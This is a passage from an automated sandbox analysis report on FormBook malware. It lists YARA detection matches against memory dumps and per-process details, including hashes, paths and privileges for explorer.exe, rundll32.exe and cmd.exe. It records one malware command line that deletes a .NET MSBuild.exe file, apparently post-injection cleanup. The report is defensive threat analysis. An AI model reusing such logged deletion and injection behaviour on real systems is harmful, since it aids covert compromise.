                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Target ID:15
                                                  Start time:15:16:16
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff662bf0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Target ID:19
                                                  Start time:15:16:40
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                  Imagebase:0x1110000
                                                  File size:61952 bytes
                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Target ID:20
                                                  Start time:15:16:46
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  Imagebase:0x870000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:21
                                                  Start time:15:16:48
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff774ee0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:30
                                                  Start time:15:17:17
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:explorer.exe
                                                  Imagebase:0x7ff662bf0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Target ID:42
                                                  Start time:15:18:17
                                                  Start date:28/01/2022
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:explorer.exe
                                                  Imagebase:0x7ff662bf0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  No disassembly